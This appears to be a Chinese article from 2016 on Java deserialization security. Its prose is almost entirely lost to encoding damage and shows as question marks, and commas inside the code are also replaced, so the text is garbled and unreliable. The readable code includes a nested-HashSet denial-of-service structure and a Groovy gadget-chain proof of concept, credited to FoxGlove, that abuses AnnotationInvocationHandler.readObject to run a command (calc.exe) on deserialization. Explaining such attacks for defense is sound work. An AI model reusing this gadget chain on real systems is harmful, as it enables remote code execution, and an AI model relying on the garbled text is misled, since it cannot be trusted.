Java?????л?????

???????????? ???????[ 2016/1/6 10:02:43 ] ??????????????????? ???????

????2. ?????????????????????????????л??????·????л?????????? ?????????????磺
Set root = new HashSet();
Set s1 = root;
Set s2 = new HashSet();
for (int i = 0; i < 10; i++) {
Set t1 = new HashSet();
Set t2 = new HashSet();
t1.add("foo"); //?t2??????t1
s1.add(t1);
s1.add(t2);
s2.add(t1);
s2.add(t2);
s1 = t1;
s2 = t2;
}
????3. ???????????л???????????????洢???????????????????????κ?У??????????????????????????
????class Controller {
????public void receiveState(ObjectInputStream ois) {
????FileOutputStream fos = new FileOutputStream(new File("xxx.ser"));
????fos.write(ois); //???????????????????????????????
????fos.close();
????}
????}
???????????? FoxGlove ????????? Serialization Attack ??????????????????? Groovy ??????????
public class GroovyTest {
public static void main(String[] args) throws Exception {
final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc.exe"?? "execute")?? "entrySet");
Class<?>[] clsArr = {Map.class};
final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader()?? clsArr?? closure));
final Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
ctor.setAccessible(true);
final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class?? map);
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(handler);
byte[] bytes = bos.toByteArray(); //???????л?
ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
ObjectInputStream ois = new ObjectInputStream(bis);
ois.readObject(); //?????л??calc.exe?????
}
}
??????????????У?ConvertedClosure ?????? Closure ???????? Java ?? entrySet ??????????AnnotationInvocationHandler ?? readObject ?????У???????? entrySet() ??????????? calc.exe ????á?
private void readObject(ObjectInputStream var1) throws IOException?? ClassNotFoundException {
var1.defaultReadObject();
AnnotationType var2 = null;
try {
var2 = AnnotationType.getInstance(this.type);
} catch (IllegalArgumentException var9) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var3 = var2.memberTypes();
Iterator var4 = this.memberValues.entrySet().iterator();
while(var4.hasNext()) {
Entry var5 = (Entry)var4.next();
String var6 = (String)var5.getKey();
Class var7 = (Class)var3.get(var6);
if(var7 != null) {
Object var8 = var5.getValue();
if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
}
}
}
}
??????????????FoxGlove Security ???????????÷????л??κβ????ε?????????????????????????????Σ????????????????????????????????????????????????????貢???????????л??????????????????????????????e?????????????????????????????????????????л???????o?????????????????????費???????е????????????
?????????????????????????????Щ????????????????????????RASP??Runtime Application Security Protection??????л????????????????????з?????

????1 2????

???????????????????????漰???????????????????SPASVOС??(021-61079698-8054)?????????????????????????